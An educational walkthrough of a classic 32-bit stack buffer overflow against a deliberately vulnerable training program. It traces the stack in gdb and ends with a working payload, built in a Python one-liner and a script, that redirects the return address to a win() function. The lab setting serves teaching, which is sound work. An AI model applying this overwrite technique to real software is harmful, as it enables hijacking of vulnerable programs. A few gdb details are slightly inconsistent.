Smash the stack
A buffer overflow occurs when a program lets us write past the end of a variable, which changes the data stored next to it. When this happens to a buffer on the stack it is called a stack buffer overflow (often loosely called a stack overflow). With it we can change the value of sensitive variables that sit next to the overflowed buffer. Also, since the return address of a function is stored on the stack, we can change the control flow of the program.
/* stack-example.c */
#include <stdio.h>
#include <stdlib.h>
void win()
{
printf("You Win ! ");
exit(0);
}
void vuln()
{
char arr[0x10];
scanf("%s",arr);
printf("Input : %s",arr);
}
int main()
{
vuln();
return 0;
}
Binary File : stack-example
The above program contains a buffer overflow bug. The size of the character array is 0x10 bytes, but scanf with a plain %s does not limit the amount of input read from the user, so anything beyond 0x10 bytes is written past the end of arr. If we give a large enough input, we can call win() by changing the return address of the vuln function.
Note
While debugging with gdb, use the binary file provided. Compiling the code on your own might change the addresses of the functions.
(gdb) x/10i main+11
0x80484e7 <main+11>: mov ebp,esp
0x80484e9 <main+13>: push ecx
0x80484ea <main+14>: sub esp,0x4
0x80484ed <main+17>: call 0x80484ab <vuln>
0x80484f2 <main+22>: mov eax,0x0
0x80484f7 <main+27>: add esp,0x4
...
When the call instruction is executed, the address of the next instruction, i.e. 0x80484f2, is pushed onto the stack and the eip register is changed to 0x80484ab, which is the address of the vuln function. The return address is stored on the stack so that after vuln finishes, execution can continue from that address and the remaining code of main is executed.
┌──────────────┐
│ │
│ │ <─ ebp
...
│ │
│ │
├──────────────┤
│ 0x80484f2 │ <─esp : value pushed by the call instruction ( return_address )
└──────────────┘
(gdb) x/3i 0x80484ea
0x80484ea <main+14>: sub esp,0x4
0x80484ed <main+17>: call 0x80484ab <vuln>
0x80484f2 <main+22>: mov eax,0x0
(gdb) b * 0x80484ed
Breakpoint 1 at 0x80484ed
(gdb) c
Breakpoint 1, 0x080484ed in main ()
(gdb) x/i $eip
=> 0x80484ed <main+17>: call 0x80484ab <vuln>
(gdb) x/4wx $esp
0xffffce20: 0xf7f9f3dc 0xffffce40 0x00000000 0xf7e04286
(gdb) si
0x080484ab in vuln ()
(gdb) x/4wx $esp
0xffffce1c: 0x080484f2 0xf7f9f3dc 0xffffce40 0x00000000
^
|_ return address pushed onto the stack
(gdb) x/i $eip
=> 0x80484ab <vuln>: push ebp
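The effect of the call instruction can be modelled in a few lines of Python. This is only an illustrative sketch, not how the CPU is implemented: the call helper and the dictionary used as memory are made up for this example, while the addresses come from the gdb session above.

```python
# Toy model of the x86 `call` instruction (illustration only).
# Addresses are taken from the gdb session above; `call` and the
# dict-based "memory" are hypothetical helpers, not a real API.

def call(regs, memory, target, next_insn):
    """Push the address of the next instruction, then jump to target."""
    regs["esp"] -= 4                   # the stack grows towards lower addresses
    memory[regs["esp"]] = next_insn    # return address is stored on the stack
    regs["eip"] = target               # execution continues in the callee

regs = {"esp": 0xffffce20, "eip": 0x080484ed}
memory = {}

call(regs, memory, target=0x080484ab, next_insn=0x080484f2)

print(hex(regs["esp"]))            # 0xffffce1c
print(hex(memory[regs["esp"]]))    # 0x80484f2
print(hex(regs["eip"]))            # 0x80484ab
```

The three printed values match what gdb shows after the si step: esp moved down by 4, the new top of the stack holds the return address, and eip points at vuln.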
Let's see what is happening in the vuln function .
80484ab: push ebp
80484ac: mov ebp,esp
These two instructions are called the function prologue. They set up a new stack frame for the function: the previous ebp is pushed onto the stack, and ebp is then set to the same position as esp.
┌──────────────┐
│ │
├──────────────┤
│ 0x80484f2 │
├──────────────┤
│ previous_ebp │ ─> ebp , esp : Stack after the function prologue
└──────────────┘
(gdb) x/2i $eip
=> 0x80484ab <vuln>: push ebp
0x80484ac <vuln+1>: mov ebp,esp
(gdb) p/x $ebp
$1 = 0xffffce28
(gdb) si
0x080484ac in vuln ()
(gdb) x/4wx $esp
0xffffce18: 0xffffce28 0x080484f2 0xf7f9f3dc 0xffffce40
^
|_ ebp is pushed onto the stack
(gdb) x/i $eip
=> 0x80484ac <vuln+1>: mov ebp,esp
(gdb) si
0x080484ae in vuln ()
(gdb) p/x $ebp
$2 = 0xffffce18 /* Now ebp and esp both point to the top of the stack */
80484ae: sub esp,0x18
80484b1: sub esp,0x8
These instructions allocate space on the stack for the local variables (keep in mind that the stack grows from higher addresses to lower addresses).
80484b4: lea eax,[ebp-0x18]
80484b7: push eax
80484b8: push 0x804858b
80484bd: call 8048370 <__isoc99_scanf@plt>
The lea instruction loads the address ebp-0x18 (the address of the arr array) into the eax register. This address is then pushed onto the stack. If you examine the address 0x804858b, it points to the string "%s". We are about to call scanf("%s",arr). On 32-bit x86, function arguments are passed on the stack and pushed in reverse order, so we first push the address of the local variable arr and then the address of the "%s" string.
┌──────────────┐
│ │
├──────────────┤
│ 0x80484f2 │
├──────────────┤
│ previous_ebp │ <─ ebp
├──────────────┤
│ │
...
│ │
├──────────────┤
│ │<─ eax : ( ebp ─ 0x18 )
├──────────────┤ │
│ │ │
├──────────────┤ │
│ addr_arr │── : It is the starting address of arr array
├──────────────┤
│ 0x804858b │ <─ esp : It points to the format string
└──────────────┘
(gdb) b * 0x80484bd
Breakpoint 2 at 0x80484bd
(gdb) c
Continuing.
Breakpoint 2, 0x080484bd in vuln ()
(gdb) x/i $eip
=> 0x80484bd <vuln+18>: call 0x8048370 <__isoc99_scanf@plt>
(gdb) x/4wx $esp
0xffffcdf0: 0x0804858b 0xffffce00 0xf7ffcd00 0x00040000
^ ^
format string _| |_ address of arr array
(gdb) x/s 0x0804858b
0x804858b: "%s"
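The stack layout that gdb shows at this breakpoint can be reproduced by replaying the instructions of vuln on a toy model. This is a sketch for illustration only: the push helper and the dictionary used as memory are hypothetical, and the starting register values are the ones observed in the gdb session.

```python
# Toy model of vuln's stack setup before the scanf call (illustration only).
# Register values come from the gdb session; the helper is hypothetical.

def push(regs, memory, value):
    """Decrement esp by one 32-bit slot and store value there."""
    regs["esp"] -= 4
    memory[regs["esp"]] = value

# State right after `call vuln`
regs = {"esp": 0xffffce1c, "ebp": 0xffffce28}
memory = {0xffffce1c: 0x080484f2}     # return address into main

push(regs, memory, regs["ebp"])       # push ebp
regs["ebp"] = regs["esp"]             # mov ebp,esp
regs["esp"] -= 0x18                   # sub esp,0x18
regs["esp"] -= 0x8                    # sub esp,0x8
arr = regs["ebp"] - 0x18              # lea eax,[ebp-0x18]
push(regs, memory, arr)               # push eax        (second argument)
push(regs, memory, 0x0804858b)        # push 0x804858b  (first argument, "%s")

print(hex(regs["ebp"]))               # 0xffffce18
print(hex(arr))                       # 0xffffce00
print(hex(regs["esp"]))               # 0xffffcdf0
```

The last argument is pushed first, so the format string ends up at the top of the stack with the address of arr right above it, as in the x/4wx $esp output.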
When scanf is called, our input is saved on the stack. With %s, scanf keeps reading until it meets a whitespace character (such as a newline), and there is no limit check on the input, so we can give input that is larger than the array. If we give enough input we can overwrite the return address.
After giving 0x20 A's as input
┌──────────────┐ ┌──────────────┐
│ │ │ │
├──────────────┤ ├──────────────┤
│ 0x80484f2 │ │ AAAA │
├──────────────┤ ├──────────────┤
│ previous_ebp │ <─ ebp │ AAAA │ <─ ebp
├──────────────┤ ├──────────────┤ ─
│ │ │ AAAA │ │
... .... │ 0x18 x "A"
│ │ │ AAAA │ │
├──────────────┤ ├──────────────┤ │
│ │<─ eax │ AAAA │<─ eax ─
│ │ │ │ │ │
├──────────────┤ │ ├──────────────┤ │
│ addr_arr │── │ addr_arr │──
├──────────────┤ ├──────────────┤
│ 0x804858b │ <─ esp │ 0x804858b │ <─ esp
└──────────────┘ └──────────────┘
The array starts at ebp-0x18, so 0x18 A's take us up to the saved ebp. The next 4 bytes overwrite the saved ebp, and the 4 bytes after that overwrite the return address.
(gdb) x/wx $ebp+0x4
0xffffce1c: 0x080484f2 /* return address before the overflow */
(gdb) b * 0x80484da
Breakpoint 5 at 0x80484da
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 4, 0x080484da in vuln ()
(gdb) x/4wx 0xffffce00
0xffffce00: 0x41414141 0x41414141 0x41414141 0x41414141
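The distance from the start of arr to the saved return address can be worked out from the addresses seen so far. A small sketch, using the ebp value observed in gdb (the variable names are made up for this example):

```python
# Offset from the start of arr to the saved return address (illustration).
# ebp is the value observed in gdb; the variable names are made up here.

ebp = 0xffffce18
arr_addr = ebp - 0x18          # lea eax,[ebp-0x18]
saved_ebp_addr = ebp           # written by `push ebp` in the prologue
ret_addr_slot = ebp + 4        # written by `call` in main

offset_to_saved_ebp = saved_ebp_addr - arr_addr
offset_to_ret = ret_addr_slot - arr_addr

print(hex(arr_addr))             # 0xffffce00
print(hex(offset_to_saved_ebp))  # 0x18
print(hex(offset_to_ret))        # 0x1c
```

So any input longer than 0x1c bytes starts to overwrite the return address.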
Let's talk about the function epilogue.
80484da: leave
80484db: ret
The leave instruction is equivalent to
mov esp , ebp
pop ebp
This moves esp back to the position of the saved ebp, releasing all the space allocated for the local variables. The pop instruction then moves the saved ebp value back into the ebp register. In effect it deletes the stack frame created for vuln and restores the stack frame of main before control returns to main. The ret instruction pops the value on top of the stack into the eip register, which returns control to main (in normal execution).
(gdb) x/i $eip
=> 0x80484da <vuln+47>: leave
(gdb) p/x $esp
$6 = 0xffffce00
(gdb) p/x $ebp
$7 = 0xffffce18
(gdb) si
Breakpoint 3, 0x080484db in vuln ()
(gdb) p/x $esp /* stack frame of vuln function is destroyed */
$8 = 0xffffce1c
(gdb) p/x $ebp
$9 = 0x41414141
(gdb) x/i $eip
=> 0x80484db <vuln+48>: ret
(gdb) si
0x41414141 in ?? ()
(gdb) p/x $eip
$5 = 0x41414141
(gdb) si
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
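The same epilogue can be replayed on a toy model to see why eip ends up as 0x41414141. This is an illustrative sketch only: leave and ret are hypothetical helper functions, and the register and memory values are those from the gdb session after the overflow.

```python
# Toy model of the function epilogue after the overflow (illustration only).

def leave(regs, memory):
    regs["esp"] = regs["ebp"]            # mov esp,ebp
    regs["ebp"] = memory[regs["esp"]]    # pop ebp
    regs["esp"] += 4

def ret(regs, memory):
    regs["eip"] = memory[regs["esp"]]    # pop the return address into eip
    regs["esp"] += 4

regs = {"esp": 0xffffce00, "ebp": 0xffffce18, "eip": 0x080484da}
memory = {
    0xffffce18: 0x41414141,   # saved ebp, overwritten with "AAAA"
    0xffffce1c: 0x41414141,   # return address, overwritten with "AAAA"
}

leave(regs, memory)
print(hex(regs["esp"]), hex(regs["ebp"]))   # 0xffffce1c 0x41414141
ret(regs, memory)
print(hex(regs["eip"]))                     # 0x41414141
```

Because ret blindly trusts whatever is on top of the stack, replacing those 4 bytes with a valid code address redirects execution there instead of crashing.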
The address of the win function is 0x0804848b
(gdb) x/i win
0x804848b <win>: push ebp
So let's write the exploit. We have to give 0x1c bytes of junk data (0x18 to fill the space from arr up to the saved ebp, plus 4 to overwrite the saved ebp) and then the address of the win function, so that the return address is overwritten with the address of win(). While giving the address as input we have to keep in mind that x86 stores data in little-endian order, so the bytes of the address must be given in reverse order: 0x0804848b becomes \x8b\x84\x04\x08. We will use Python to generate the crafted input which triggers the bug and calls the win function.
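A minimal sketch of such a generator in Python 3 is given here. It is not the tutorial's original script: the names WIN_ADDR, OFFSET and build_payload are chosen for this example, and the address is only valid for the provided binary.

```python
import struct
import sys

WIN_ADDR = 0x0804848b      # address of win() in the provided binary
OFFSET = 0x1c              # 0x18 bytes up to saved ebp + 4 bytes of saved ebp

def build_payload(target=WIN_ADDR, offset=OFFSET):
    """Return padding followed by the target address in little-endian order."""
    return b"A" * offset + struct.pack("<I", target)

if __name__ == "__main__":
    # Write raw bytes; a text-mode print could re-encode bytes above 0x7f.
    sys.stdout.buffer.write(build_payload() + b"\n")
```

Saved under a file name of your choice (say exploit.py, a hypothetical name), its output can be piped into the binary in the same way as the one-liner. struct.pack("<I", ...) does the byte reversal, so the address can be written in its natural form.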
Let's run it outside gdb .
python -c 'print "A" * 0x1c + "\x8b\x84\x04\x08"' | ./stack-example
Input : AAAAAAAAAAAAAAAAAAAAAAAAAAAYou Win !
We have successfully changed the control flow of the program.